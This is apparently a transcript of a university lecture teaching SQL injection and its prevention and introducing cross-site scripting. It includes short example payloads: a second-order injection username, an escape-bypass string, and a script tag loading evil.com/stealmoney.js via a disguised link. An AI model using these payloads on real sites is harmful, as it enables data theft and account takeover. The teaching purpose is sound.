All right, folks, let's keep going. We've got one more week of class left, so we're all excited: one more week, the final, the final CTF, so everything should be awesome. Today we're going to finish covering SQL injection, and then we'll start studying cross-site scripting, one of the most prevalent vulnerabilities on the web today. So can somebody sum up the essence of a SQL injection vulnerability? I would say close. You may be able to write to the database, you may not be able to write to the database. But how do you get there? What's the code vulnerability in the web application that allows you to perform a SQL injection? What kind of strings? Exactly: concatenating constant strings together with user input in order to create a SQL query. This is an important point. Please don't leave this class thinking that concatenating strings is a vulnerability. I don't want you to tell me that, because it's not true. It's using that string to issue a SQL query that makes it a vulnerability. Cool. So what can you do with a SQL injection vulnerability? You can potentially drop the database, or get information out of it. You can get access to the server. We didn't talk about it, but yes, in some databases there are ways to leverage a SQL injection exploit to get code execution on the system. What else? Yeah, you can get all the data from the database, right? And this is big business. Way back in the history section we talked about Albert Gonzalez, the leader of the ShadowCrew hacking crew. They were responsible for hacking TJ Maxx and Heartland Payment Systems. What they would do is war drive around these retail locations. War drivers drive around looking for unsecured Wi-Fi.
So they'd find unsecured Wi-Fi, get onto the network, and once they were on the network they were able to use SQL injection vulnerabilities to get in and steal customers' credit card data. They made a ton of money, actually. It's over 100 million credit cards they sold, so they made millions and millions of dollars using SQL injection vulnerabilities to steal credit cards. It got really crazy. They got into Heartland Payment Systems, which is a credit card processing company. I don't know if it was exactly through SQL injection, but they were able to get onto a credit card processor, the thing that was processing every single credit card, and just steal all the cards that were going through Heartland Payment Systems. All right, cool. So with SQL injection, as we know, we have some strings concatenated together, including unsanitized user input, which allows an attacker to alter the semantics of the SQL query. There are different types of SQL injection. There's the classic example we saw, where the user input given to a form was used as is in the query. That would be a regular, standard SQL injection. A second-order SQL injection is pretty cool. The idea is that oftentimes when you put data into the database, it's sanitized correctly. You do your insert statement, and you call the sanitization function, mysql_real_escape_string, so the data gets into the database just fine. But later on in the application, something fetches that data from the database and then uses it as part of a SQL query. This is called a second-order SQL injection. So when your data goes into the application, it's perfectly fine. No vulnerability at all. But because that data came from an untrusted user and is later used to construct a SQL query, that's going to become the big issue. Cool. Yeah.
So think about an application that has usernames, and your username can be whatever you want. Say john'--, which is a valid name as far as your application is concerned. And the application safely escapes it. It's inserted into the database as backslash-tick, so there's no possible way a SQL injection vulnerability occurs on the insertion, because the username sits between two single quotes and every single quote in the attacker's input is being translated to backslash single quote. So that's all perfectly fine. This is 100% legitimate code that you can write in your application. So you're saying all you need to make sure is that whatever the user inputs is in quotes? Well, it depends. You need to sanitize it such that the user input cannot change the syntax of the SQL query. In this case, if their input is between single quotes and you properly escape it, then there's no way they can change the syntax of that SQL query. You can think of it as there being no way to break out of the single quotes, because they cannot put in any character that transitions the SQL parser to another state. But later on, let's say in the update password function, you get the username from the database. Here you've gotten this name value from the database, so the developers assume it's safe because it's from the database. It's not from user input like a GET form or a POST form. And so you run UPDATE users SET password = '...' WHERE username = 'john'--', and now the single quote that was safely stored in the database is causing a SQL injection vulnerability, because it's being reused at a later point in time in a SQL query. So again, it still comes back to concatenating strings with user input. The question is where the user input comes from. Does it come directly from the user, or does it come from data stored in the database?
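Here is a minimal sketch of that second-order pattern, written in Python with the standard sqlite3 module rather than the PHP and MySQL used in class. The table layout and the function names register and change_password_vulnerable are made up for illustration, and SQLite escapes a quote by doubling it instead of using a backslash, so treat this as an analogy under those assumptions and not as the application's actual code.

```python
import sqlite3

def register(db, username, password):
    # Safe on the way in: the values are bound, so the quote in the username
    # is stored as plain data and cannot change this statement's syntax.
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)",
               (username, password))

def change_password_vulnerable(db, user_id, new_password):
    # The username comes back out of the database, so it "feels" trusted.
    (username,) = db.execute(
        "SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    # The new password is escaped (SQLite style: double the quote), but the
    # stored username is concatenated as is. This is the second-order bug.
    query = ("UPDATE users SET password = '" + new_password.replace("'", "''")
             + "' WHERE username = '" + username + "'")
    db.execute(query)
    return query

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users "
           "(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
register(db, "john", "johns-secret")      # victim, id 1
register(db, "john'--", "attacker-pw")    # attacker, id 2

executed = change_password_vulnerable(db, 2, "owned")
passwords = dict(db.execute("SELECT username, password FROM users"))
```

The attacker changes "their own" password, but the executed query ends in WHERE username = 'john'--', so the row that actually gets updated is john's.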
Once john is stored, the dash dash should not be there, should it? Why? Because that's the end of the query, right? The web application is sanitizing the tick to be backslash-tick. It's just like double quotes in a string in a programming language: if you want to put in a double quote you write backslash double quote, and it's parsed as meaning the double quote character. So you can insert arbitrary data into a database. It doesn't even need to be text. So we can say, create a user with the username john'--. The web application sanitizes that, changing the tick to a backslash-tick, and then the whole query will be INSERT INTO users (username, password) VALUES, and then single quote, john, backslash single quote, dash dash. And that all gets stored as the username in the database. Think about it as a provenance issue in some sense: where did this data come from? This data came from the user, and yes, it was sanitized when it was put into a SQL query at the start, but that doesn't stop it from containing any kind of crazy characters. That means when you reuse that data later you also have to sanitize it, because you have to know that it possibly comes from the user. So we can look at an example here. This would be the register page. We're making a SQL query in PHP. We're going to INSERT INTO users (username, password) VALUES, and then open parenthesis, single quote, mysql_real_escape_string of the POST name, a closing single quote that matches the starting single quote in our VALUES clause, comma, single quote, mysql_real_escape_string of the password, and then concatenate a single quote and a closing parenthesis, semicolon. And then we're going to run that query. So there's absolutely no vulnerability here. This is 100% secure code. You cannot cause a SQL injection. There is no SQL injection vulnerability here, even though you're concatenating strings together. Why is that?
Yeah, because we're... So I lied a little bit, but that's fine. Let's look at where I lied. What does this mysql_real_escape_string need to do? I said it translates ticks to, what did I say, backslash tick? Okay, that looks right. So this means if you have some SQL query with WHERE foo = ' and then your user input, and you put in a single quote, it becomes backslash single quote. Therefore you shouldn't be able to transition the parser to some other state. But as described, this is a bad sanitization function. Why is it bad? Think about every kind of sanitization or escape character we've looked at. For instance, URLs. What was the escape character in URLs? Percent. Right, so you have percent and then the code. So how do you represent a percent character in URL encoding? Percent percent? No, not percent percent. It seems like it should be, but it isn't. You do have to escape it, though. How? It has its own percent code: it's %25. So the percent character itself encodes to %25. For this language, you have to study the syntax to understand everything, but it's pretty clear that if backslash single quote means single quote, you need a way to escape a backslash. How do you escape a backslash? Backslash backslash. Right. So let's play a what-if game where I'm the SQL query. My input is foo. My output is going to be foo, and the output used in the SQL query will be WHERE foo = 'foo'. Is there any SQL injection here? Have we changed the syntax of the query at all? No, not at all. Cool. What if I had f'oo? That's going to translate to what? f, backslash, tick, o, o.
And that's going to be WHERE foo = 'f\'oo'. I'm running out of room, so I'm just going to start over. So when SQL parses this, what's the string it's going to compare against? f, single quote, o, o. Right? Because remember, this is just a way to represent the single quote character inside a single-quoted string, exactly like every programming language you've ever used. You're very familiar with this already. So is this secure against SQL injection? What if I did this: f, backslash, single quote, o, o. What's that going to be translated into? This is my transformation function. Triple backslash? How is that triple backslash? My rule is to transform a single quote into backslash single quote. Do I change the backslash at all? No. What do I do with the single quote? Backslash single quote. So I have my original backslash, then my backslash single quote, then o, o. And that's going to go into WHERE foo = 'f\\'oo';. So how will this parse? You're going to be escaping the backslash, because we have two backslashes here. The SQL engine parses that pair as a single backslash character. Then it sees the single quote, and that's the ending single quote that matches the first single quote. And now I have a syntax error, because I have this oo' stuff afterwards, so it's not a valid SQL query. Was I able to change the syntax here? Yes. So this is a good example of why you should never write your own sanitization routine: you're going to do it wrong. I can guarantee it. And you don't have to take my word for it. Even the built-in sanitization functions sometimes get it wrong. Sometimes it's newlines.
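The what-if game above can be replayed in a few lines of Python. This is a toy under stated assumptions: naive_escape is the one-rule function from the board, better_escape adds the "escape the backslash too" rule, and read_string_literal is a made-up, drastically simplified stand-in for how a MySQL-style parser reads a single-quoted string. Real escaping functions have more rules than these two, which is the lecture's point.

```python
def naive_escape(s):
    # The one rule from the board: ' becomes \' and nothing else changes.
    return s.replace("'", "\\'")

def better_escape(s):
    # Escape the escape character first, then the quote.
    return s.replace("\\", "\\\\").replace("'", "\\'")

def read_string_literal(sql):
    """Read one single-quoted literal from the start of sql.

    Returns (decoded value, text left over after the closing quote).
    Toy rule: a backslash makes the next character literal.
    """
    assert sql[0] == "'"
    out, i = [], 1
    while i < len(sql):
        ch = sql[i]
        if ch == "\\" and i + 1 < len(sql):
            out.append(sql[i + 1])   # escaped character, taken literally
            i += 2
        elif ch == "'":
            return "".join(out), sql[i + 1:]   # unescaped quote ends the literal
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated string literal")

attack = "f\\'oo"   # the five characters: f \ ' o o

benign = read_string_literal("'" + naive_escape("f'oo") + "'")
broken = read_string_literal("'" + naive_escape(attack) + "'")
fixed = read_string_literal("'" + better_escape(attack) + "'")
```

With the naive rule, the literal ends early and the leftover oo' lands outside the string, where it is parsed as SQL. With both rules, the whole input stays inside the literal.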
Sometimes it's other crazy stuff. And they have to be fixed and updated. So do not do it yourself. You will definitely do it wrong, and there are a lot of ways to get it wrong. So we would also need a rule for the backslash: backslash becomes backslash backslash. If we add that, does it get us where we want to go? Take the same example. Now the input f\'oo gives us our nice f\\\'oo, which makes the query WHERE foo = 'f\\\'oo'. How does the SQL engine parse these first two backslashes? That's one backslash. And then what about the backslash single quote? That's a single quote. So it's exactly what we wanted to have. But we need to handle all of these kinds of cases, and this is why you don't want to do this yourself. Okay. But this function does this: mysql_real_escape_string. So the register page does the query, inserts the row, gets the inserted user ID from the database, and sets the user's session to be this user ID. In this case there's absolutely no way you could change the semantics or the syntax of that SQL query, because they're using mysql_real_escape_string. Now, on the change password page, this is code that any of us could write. I've probably written something similar before. If you want to change your password, you need a new password to change it to. You'd also need a way to make sure the user is logged in and all that kind of fun stuff. So I'm going to fetch from the database: get the username and password from users where the ID is the session ID, which we set earlier. So is there a SQL injection here? There's a MySQL query. It's SELECT username, password FROM users WHERE id = and then concatenate the session user ID.
So that's the user ID that we set on the register page, which was the result of a call to the database, I believe mysql_insert_id. We're setting that to be this $_SESSION UID. I can't hear you. Isn't it a global? You could change it during the execution. It is a global. I mean, $_SESSION is a superglobal. But what does that mean? It's possible to change it while this page is running, but that's not a problem by itself. How would an attacker change it? I don't think you can do that to a superglobal from outside. You can't directly change that. Does this have something to do with accessing the cookie in the session? Yeah. So how do we handle sessions? And what's our goal? You can't just say maybe something changes. Right. So the question is, where does this session UID come from? If it's in the cookie and we can change it, then there's a clear SQL injection on it. Should you store user data in a cookie? No. Why not? Because they can change it, and they can do exactly this. And more than that, they could just change the user ID to be any user and completely change who they're logged in as. Right. So PHP, as much as I've been hating on it, does do some things correctly, and one is the default behavior of sessions. A session sets a cookie that's a random value. You can look at it; when you browse the web, you'll see it all the time. It's PHPSESSID, I believe, a random value that maps to something on the server. I can't remember exactly where it usually lives, but basically all the session information is stored in a file. That's where the user ID is stored: a file on the server that only the web server has access to. And so you can't change that.
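The session idea can be sketched as follows. This is not PHP's implementation: the SessionStore class is hypothetical, and it keeps session data in an in-memory dictionary where PHP would use a file on the server. It only illustrates that the browser holds a random identifier while the user ID itself stays on the server.

```python
import secrets

class SessionStore:
    """Toy server-side session store; data never leaves the server."""

    def __init__(self):
        self._data = {}   # session id -> dict of session variables

    def create(self):
        sid = secrets.token_hex(16)   # random cookie value, hard to guess
        self._data[sid] = {}
        return sid

    def get(self, sid):
        # A forged or unknown cookie value maps to no session at all.
        return self._data.get(sid)

store = SessionStore()
cookie = store.create()          # this value is what the browser would hold
store.get(cookie)["uid"] = 1     # set by the application, e.g. from the insert ID

own_session = store.get(cookie)
forged_session = store.get("1")  # the user cannot "become" uid 1 by sending 1
```

The design choice to notice is that the client can only change which session it points at, and guessing another valid random identifier is impractical, while the stored uid is never taken from the cookie.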
So who set this session UID value? We did. The application did, right? We set it to one, or rather, not exactly random, some ID from the database. The database told us through mysql_insert_id: when you run an insert statement and you have auto-incrementing IDs, this returns the ID of the row you just inserted. So you know that's that user's ID. We're setting it here. We would have to check, because maybe there's a weird case where, for whatever reason, user data flows into this session UID, in which case, yes, there could be a SQL injection, because if they can change that value we're going to have a bad time. But normally this would be fine, because we know it's an integer and we know we control it. Still, we should escape it anyway to be 100% safe. I would definitely do that. And this hopefully shows why it's really difficult to reason about the security of these things. If there's any code in any part of our application where user input can flow in and change the session UID value, then we've completely compromised the security of our application. Okay, so we fetch this row from the database. Then there's the new password, the password that was passed in through the POST parameter. That is an unsafe string, because it's coming directly from the user, so I'm going to escape it. So my query is UPDATE users SET password = single quote, mysql_real_escape_string of the new password, concatenated with single quote, WHERE username = single quote, and then concatenated with the row's username, the username that we just got from the previous query. And then we run that query. And where did the row's username come from? From the register page? Sorry, you're right: the row's username came from this MySQL query, and where did that data come from? From the user. Right? And what makes this even more difficult is when you think about how applications scale.
So let's say we were super selective on our register page. Let's say we make sure that usernames are only alphanumeric with no spaces. You can restrict it enough that it's almost impossible to do a SQL injection. Or let's say not even alphanumeric, just A through Z. That's all your username can be, nothing else. It's impossible to have a SQL injection then, because you need some character to transition the context. So let's say we've done that, and we've restricted the space of our usernames. Cool. If I guarantee you that the register page has code that checks and enforces that, could this still be a vulnerability? A through Z? On the password? No, on the username. How is it enforced? We wrote it in the PHP, in an if condition: on the register page we check the username, and if it's not A through Z we exit and say, terrible, we're not going to allow you to create a user with that username. So is this safe? Are we storing the password? That doesn't matter here. I think it's safe. I'm hearing some "safe"s. I would say it's safe. But what if there's a place where you can change your username? You may want to change your username, and we have to make sure that the enforcement is done there as well. Next, what happens when our company wants to develop a mobile application, and you want an endpoint that the mobile application can talk to in order to register users? That is probably going to be completely different code from the register page on your website. Now you have to make sure the check is also enforced there.
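A small sketch of that A-through-Z rule, and of why it has to be shared by every way data gets in. The function names are hypothetical, and accepting both upper and lower case is an assumption, since the lecture only says "A through Z".

```python
import re

# Assumption: letters only, either case, at least one character.
USERNAME_RE = re.compile(r"[A-Za-z]+")

def is_valid_username(name):
    # fullmatch: the whole string must match, not just a prefix.
    return USERNAME_RE.fullmatch(name) is not None

def require_valid_username(name):
    if not is_valid_username(name):
        raise ValueError("username must contain only the letters A through Z")
    return name

# Every path that writes a username has to go through the same check.
def register_from_web(name):
    return require_valid_username(name)

def register_from_mobile_api(name):
    return require_valid_username(name)

def import_from_partner(names):
    return [require_valid_username(n) for n in names]

checks = [is_valid_username(n) for n in ("john", "john'--", "", "john smith")]
```

If any one of these entry points skips the call, the guarantee that "usernames in the database are safe" silently stops being true.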
And then let's say you merge with another company, or you have some agreement where your company is working with another company, and you want all of your users to be able to automatically import their data from that company. Now you have another endpoint where data is coming into the system, and it's one you don't control, right? So if all you're doing is relying on the fact that "no, no, my input is good when I put it in the database", you cannot trust that. You have to always assume that data in the database could be dangerous. Security's hard. That's kind of the moral there. And this is actually a super fun but really tedious type of SQL injection to exploit, because you need to create a user first, then change the password, then get an error message, then create a user again and change the password again. I guess you can script these things, but it's a different way of thinking. Okay, so how do we prevent SQL injections? They seem terrible. Have I scared you with them enough? No? Do you want to go back so we can talk about more stuff? How do we solve them? It actually has nothing to do with the database itself. It's not the database's fault that we have SQL injection vulnerabilities, because the database is doing exactly what we asked it to do. We sent it some bytes and said, parse this as a SQL query and give me the results. A student asks: wasn't it said that a good way to prevent some of these attacks is to restrict the information that can be stored in the database? I think we're getting there in a second. Another student: I was confused about the role of the database. I usually treat the database as pretty dumb. Yeah, so basically it comes down to that problem of parsing queries. Fundamentally, we don't want to parse queries. We don't want the database to have to parse queries.
And we definitely don't want the database to parse queries that contain user input. So this is the key. The goal of protection is to never allow client-supplied data, attacker data, to modify the syntax of SQL statements. This is the core. How you do that varies, and the approaches have different pros and cons. Okay. One way is that some databases have the ability to do stored procedures, so you can write some SQL queries into the database, essentially save them, and later say, hey, run this query and pass this data to it. Which is, I think, what you were talking about. It's kind of annoying. I've programmed both ways. Stored procedures can get hairy, and I've seen stored procedures that themselves have SQL injection vulnerabilities, because they're fetching data and creating queries dynamically. There's also an interesting dynamic here, because essentially you're putting logic into the database, whereas a lot of the philosophy now is that your application should have all the logic and the database should just be dumb storage. So there's a tension there. The other way, and the best way, to do this is with prepared statements. This is what I highly recommend. Rather than a one-step process where the web application says, here are my bytes, parse this as a SQL query, it makes a connection first and says: here is the SQL query that I will execute, with placeholders. Then it says: set placeholder 1 to this value, set placeholder 2 to this value, and then execute the query. So the idea is that you're separating the parsing from the actual input of user data. This is the absolute best way to go. You basically specify the structure up front. If you look at it, it looks like this. This would be some PHP syntax: SELECT * FROM users WHERE username = :name.
So here in this syntax, :name is a placeholder, and then AND password = SHA1(CONCAT(:pass, salt)). Look at that, this is actually a good query, with salted hashes. Then you issue a bind parameter call to say, bind :name to the actual $name, and bind :pass to the pass parameter. Now when you execute this query, because the SQL engine has already parsed it and has the parse tree, it does not need to parse anything again. Now, does this prevent you from issuing a prepared statement with user input in it? No, you just don't have any user input until you bind it. So what if I deleted this :name from the prepared statement, put in $name instead, deleted this bind parameter call, and put single quotes around it, because that's how I like to do it? Then you're building the parse tree based on $name. Yes, and we'll see why that matters. So this is why, even though it's one of the things I recommend the most, the problem is you have to be vigilant in your application. It's a lot to check in some sense, because you have to look at every single prepared statement, every single DB prepare call in the application, and ask: is this a constant string or not? If it's a constant string, you're fine. Is the colon a delimiter for a parameter? Yes. Okay, let's go through an example. I was considering doing this anyway. It's going to be annoying to draw, but that's okay. All right, so we have SELECT * FROM users WHERE username = :name AND password = SHA1(CONCAT(:pass, salt)). And the thing is, like I keep saying over and over, it all comes down to parsing.
So when the SQL engine parses this prepared statement, it's going to say, well, this is a select statement, right? It's going to do it just like you did in 340 and all those other classes. So it'll have some select node. I don't know the exact parse tree, but you can actually look this stuff up, which is kind of cool. There's the star, there's the table, users, and then there'll be a where clause, which has two things. Let's draw it like this. It'll have some kind of AND. On the left side of the AND there's an equality comparison, with username on the left and :name on the right. And on the right side of the AND we have the password comparison, with SHA1 on its right. So it's not going to be expanded any further? Exactly, this is the key point. When you call DB prepare, the SQL engine takes this query and turns it into this parse tree. Later, when you say bind :name to this value, it goes to the parse tree and says, okay, great, here, username equals, boom, whatever you put in for name. You can put in literally any value. There's no possible way to change the syntax of this query, because you've already parsed it. So even if you set name equal to :pass or something, that's just the value, because you're already past the parsing stage when you're binding things. Does that make sense?
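A minimal sketch of the same query shape using Python's standard sqlite3 module, which accepts :name style placeholders. Several things here are assumptions for illustration: the table layout, the SALT constant, and hashing in Python with hashlib because SQLite has no built-in SHA1 function. SHA-1 appears only because it mirrors the query on the board; it is not offered as a password-storage recommendation.

```python
import hashlib
import sqlite3

SALT = "example-salt"   # hypothetical constant, only to mirror the lecture's query

def hash_password(password):
    # Stand-in for SHA1(CONCAT(:pass, salt)) from the board.
    return hashlib.sha1((password + SALT).encode()).hexdigest()

# A constant string: the structure is fixed before any user data exists.
LOGIN_SQL = "SELECT id FROM users WHERE username = :name AND password = :pass"

def login(db, name, password):
    # Values are bound to the placeholders, never spliced into the SQL text.
    row = db.execute(
        LOGIN_SQL, {"name": name, "pass": hash_password(password)}).fetchone()
    return row[0] if row else None

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users "
           "(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
db.execute("INSERT INTO users (username, password) VALUES (:name, :pass)",
           {"name": "john", "pass": hash_password("hunter2")})

good = login(db, "john", "hunter2")
comment_attempt = login(db, "john'--", "anything")
tautology_attempt = login(db, "' OR '1'='1", "anything")
```

The two injection attempts are simply compared as odd-looking usernames, because the bound values fill a slot in a query whose structure is already fixed.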
So yeah, you're not parsing it again. This is the key: you parse it once, you keep the tree structure, and then you put each of the values in. And this gets down to the core problem of SQL injection, because this tree is what the developer wants. If you could peek into the developer's mind, this is the query they had in mind when they were writing the SQL. The problem is that SQL injection allows us, from this :name position, to completely change the syntax of the query, turning it into different trees and all this cool fun stuff. That is really the core. Any other questions on it? Another thing, which I don't have on the slides, is to use a good object-relational mapper, some kind of good database interface. For instance, Ruby on Rails has a library called Active Record, which is one of the ways you talk to the database, and if you use the default, standard ways of interacting with it, it basically guarantees no SQL injection. Rather than creating a SQL query like I'm doing here, it adds a layer on top where you interact with objects that then issue queries to the database. So if you want to get a user with a certain ID, you call a method, I believe on the users class, something like get, and pass in ID 10, and the engine takes care to make sure everything is sanitized and that it uses proper prepared statements. You can also do complex things. For example, to create users you create an object and then save it to the database, and it creates the insert statement for you, so you don't have to worry about any of that.
The tricky part, and this is why I have a conflicted relationship with these object-relational mappers, is a couple of things. First, they're often not super efficient, because they're general-purpose libraries. Sometimes an object has a column that's huge that you don't want to fetch all the time, and if you're writing queries by hand you can leave it out. So what people do is they oftentimes have to drop down and use methods of the ORM, this database wrapper, to directly issue SQL statements, because they realize, oh, the ORM is super slow on this query, which means I need to write it by hand. And when they do that, because they're not used to writing SQL queries by hand without SQL injection vulnerabilities, they end up introducing vulnerabilities that way. So it's kind of insidious. It's great because it helps you never think about the database, but once you do have to think about the database, those are the times you really need to be very careful with what you're doing. So there's no magic bullet in security, I guess, is the moral. Cool. Then there's sanitizing your inputs. This is the third option, and I'm deliberately putting it lower. This would be writing SQL queries by hand and manually sanitizing all the inputs every single time. It's a recipe for disaster. Yes? Regarding the object-relational mapping, those definitions are stored on the server, right? Yes, they're in the server code. So there's no way someone could change the definitions? If somebody can change the code that's running on your server, you have bigger problems than a SQL injection. Much bigger problems. It's similar to, well, if somebody uploads PHP code to your server and starts executing it, you have massive problems. It doesn't matter that you don't have a SQL injection; you have remote code execution, so they can do whatever they want. Cool. Is sanitizing inputs ranked lower because there's no perfect
sanitization function? It's not that. For SQL injection, if you know what you're doing, you can do it quite simply. You just have to do it in literally every single place. That's it. It's very similar to using arrays and buffers in C. You can write a C program that is secure. That's not impossible, but it's very, very difficult, because not only does every program point need to be correct, every path through the program needs to be correct, and that's the really difficult part to think about. Especially with something like the web, where there are not only multiple paths but also multiple different orderings of requests to the web application, so you have to worry about that as well. But yes, you could do it. I'm just trying to advocate for good practices. Okay, so now we're going to move on to cross-site scripting. Cross-site scripting is one of the oldest vulnerabilities on the web, and it is still around despite 20-plus years of research. That may be a slight over-approximation, but despite tons of research, you can probably go right now, search for any of the popular sites along with XSS, and find tons of examples. Google, Microsoft, Facebook: they all end up having cross-site scripting vulnerabilities despite massive efforts from these companies. And there's a site, xssed.com, that keeps track of cross-site scripting vulnerabilities on the web that have been publicly disclosed. So what is the whole point of cross-site scripting? The entire point of SQL injection is to change the syntax of the SQL query so that we can alter the data in the database, fetch it, or delete it. Cross-site scripting comes down to the same-origin policy. So what is the same-origin policy? Yes? It's almost like that was an important part of the course, and
why it was on an exam. It's crazy. What was the essence of the same origin policy? Right, so it comes down to all kinds of things. If you're using your browser and you have, say, two pages open in two tabs, or even a single page that has multiple iframes, it should never be the case that some attacker could influence what is shown on facebook.com or your bank's website, right? The only thing that should be executing there is that site's own code. And so the same origin policy tells you what's from the same origin, right? Protocol, host, and port is how you determine it. And really, what cross-site scripting comes down to is bypassing the same origin policy. So cross-site scripting is basically an attacker getting to control the JavaScript that executes in something like facebook.com or google.com, which is circumventing the same origin policy. Presumably the developers of those sites do not want an attacker to execute JavaScript. Okay, so this is key, because this is the core idea behind cross-site scripting. A lot of people think, well, it's JavaScript executing in your browser and blah blah blah, but it really comes down to bypassing the same origin policy, and this is key. So we like to classify and think about cross-site scripting in a number of different ways. I kind of hesitate; I mean, this is something that I guess is taught and I guess should be taught. It's kind of a weird, arbitrary distinction, although it does help a little bit. And so the idea is, basically, it's a similar problem to web applications generating SQL queries. So when we looked at a PHP page, how does it generate the HTML? Yeah, print it, or, I mean, really everything outside of the special PHP tags is just output as is, and everything in between is
interpreted as PHP code. So essentially, if you think about it, PHP itself is concatenating strings together to create the HTML output to send to the user's browser. And so what does the browser get? Yeah, the browser gets HTML. What does it get from PHP? So PHP has HTML output, yes, but how does it know that it's HTML? From what? The doctype, maybe, but it has to be able to read the doctype. It parses the document it receives, yeah. So what does it receive? It doesn't receive a document; it receives bytes, a sequence of bytes: here's this hex value, this hex value. So the browser's job is to take that sequence of bytes and create some meaning from it. The main way is looking at headers and doing all kinds of other tricks to figure it out, but in the case of HTML, it's going to take those bytes and parse them as an HTML page. So we looked at HTML, we saw all the various tags. So when we look at HTML, how does a developer say, I want this JavaScript to be executed on this page? Script tags, that's what it comes down to. I know you guys are upset. Okay, so we have an HTML page: start HTML tag, end HTML tag, and in between those two we have other stuff. And let's say I want some JavaScript code that's going to pop up an alert, because that's super annoying, an alert that says hello world. So let's say this is bank.com, some bank's website. The developer wants this JavaScript code to be executed in the user's browser, so how do they make sure that happens? Ensure, maybe that's too strong a word. Isn't the alert a pop-up that comes up? That isn't HTML; I thought that was a browser object. Let's just think about it. Okay, so as a developer, I want this JavaScript code, this alert hello world, to be executed every time a user visits my page. How do I make that happen?
This is not a trick question. Make a script tag and put it in the HTML. The tags themselves are not JavaScript, but the script tags are the way that I communicate as a developer to the browser: I want this code to be executed. So when the browser gets the sequence of bytes, it parses it and says, oh, there's the HTML tags, and I'm creating the HTML tree structure; oh, there's a script tag, I know how to parse script tags, I'm going to check what language it is, I'm going to parse it as JavaScript, there's a whole JavaScript parsing engine, and everything goes from that. So how did the browser know that the developer intended for this JavaScript to be executed? From the script tags on the page that it got, right? If you think about it, that's all the browser knows: the browser only has the bytes that are sent from the server, and so it looks for script tags. I'm not trying to trick you; this isn't a trick. This is thinking through different things from different perspectives. So what if the page of bank.com had a super cool feature: start HTML, end HTML, and in between there's an H1 tag, a heading tag, so it's super cool, and it says hello, and then after that there's PHP code to do echo $_GET['username']. It's not a great example, but it's fine for this. Cool. So when you go to bank.com with username equal to foo, what's the HTML page you get back?
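To make the page just described concrete, here is a minimal sketch. It is written in JavaScript rather than PHP so it can be run on its own with Node.js; the function name renderGreeting and the exact markup are assumptions for illustration, not the code from the slide. It builds the response the way the PHP page does: a static string, then the raw username parameter, then another static string.

```javascript
// Hypothetical stand-in for the PHP page on bank.com. It mirrors
// "static HTML, then echo of the username GET parameter, then static HTML".
// Nothing is escaped or checked: the parameter is inserted exactly as received.
function renderGreeting(requestUrl) {
  // Read the "username" query parameter from the request URL.
  const username = new URL(requestUrl).searchParams.get("username") || "";
  // Plain string concatenation, just like building a SQL query from pieces.
  return "<html><h1>Hello " + username + "</h1></html>";
}

console.log(renderGreeting("http://bank.com/?username=foo"));
// prints: <html><h1>Hello foo</h1></html>
```

The point of the sketch is only that the server treats the parameter as one more string to glue into the output; whatever bytes arrive in username go straight to the browser.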
A page like this, that's going to say hello foo. So then what if we access, well, I guess that was there. So what if we're a really cool bank and we want their name to appear bold; we don't just want their name to appear like a regular name. So what if we set username and add the bold tag around foo? What's the output of this request to this PHP page? Would it be hello, then a start B tag, foo, and then an end B tag? Yeah, sure, you can do that; I have faith in you. Also, the browser, I believe, will URL-encode it for you, so you don't need to worry about it too much. Okay, so when we get this back, from the browser's perspective, what does the browser get back from making this request? Raw bytes that it's meant to parse as HTML. So what does the browser do when it sees this B tag? It says, oh, this is a tag, and there's some style associated with it; it typically means make it bold, and so it's going to turn it bold. Did the developer of this application intend for that bold tag to be there? This is the PHP code of the page; there's no B tag anywhere in there. Where did that B tag come from? It popped out of the ether: it came from user input, it came from the URL of whatever the request was. So now, what if we wanted to use some JavaScript to pop up an alert box with the user's name of foo? Could we do that? Yeah. So what would we set the username to? We can change these B's to script, so we have a script tag, then alert foo inside, and then an ending script tag. And so now, when the browser makes this request to the web application, what is PHP doing with the username parameter? It's just concatenating it with all the other strings, right? If you think about the PHP code, there's this first chunk of static code, a static string, so exactly the same as a SQL query: we have a static part of the query, and now you're appending the GET parameter of user
name, and then after that there's a static part of the page, this ending h1 tag and ending html tag. The application does exactly what you told it to do, right? The PHP application is concatenating your strings together and returning that output to the user. So now when your browser gets this, it's going to get this series of bytes, right? So when the browser parses this, what's it going to parse this page as? HTML. So it's going to parse this HTML page: there's the start of the HTML page, it's got an h1 tag, the heading tag, and inside there there's a script tag. So it goes, oh, I know how to handle script tags, this must be some JavaScript code. It parses what's inside, there's alert foo, it executes that as JavaScript, and up pops an alert. Did the developer want this script tag to appear here? No. How do you know that? Yeah, it's not there in the PHP source code, right? And so let's say that I send you a link to bank.com with username set to a script tag, and here I'm not going to do inline script; I'm going to do script source equals evil.com slash x.js. So now, rather than inline JavaScript, I have an external JavaScript reference to a JavaScript file. Actually, let's change this; we'll change it to stealmoney.js. So now let's say I create this link, I URL-encode this parameter, and then I send this to one of you. Is somebody going to click on this link? Yes. I mean, if it came from me, you'd probably all click on it, but even if it was somebody else, you'd probably still click on it anyway. Which you? The you standing here or the other you? Exactly. Yes, somebody's going to click on it. So think about it this way: I send you this link, here's this awesome bank.com link, and let's actually, maybe I can pop this over quick and URL-encode it so it looks better. Okay, so I send you a link like this. Seems fine. You may be skeptical of these script tags, but if I change all of those into URL encoding, there's no way you're going to look at those
very carefully. A lot of URLs have this kind of weird data encoded into the URL, so who would think anything of it? I can send you a TinyURL or short URL so it's even shorter; maybe I can use something like Google's shortener so it looks like it has more weight, because it looks like it's from Google or whatever. Anyway, there's a lot of ways you can get somebody to click on this link. So you click on this link, and the PHP code is going to execute, and where this echo is, it's going to output hello and then a start script tag with a source attribute of evil.com slash stealmoney.js, followed by an end script tag. So what is the browser going to do when it sees this? And does an external JavaScript respect the same origin policy? No. It's a complete hole in the same origin policy, there to allow a developer to include code from a third-party domain that they want to be included in that page. So where did this JavaScript code come from? From me, from the attacker, right? But it's executing now in the domain of bank.com. So I completely circumvent the same origin policy, because I've tricked you, or essentially not you, but I've tricked your browser into executing code whose origin is me but which is actually executing in the origin of bank.com. And at this point, we've seen what we can do with JavaScript. What's some stuff we can do with JavaScript? That's good. So if this was on the login page, we could put in JavaScript to steal your username and password as you filled them out on the page. Do you think validation is a component? Um, yeah, maybe; I mean, validation may or may not help us; it kind of depends. What else could we do? 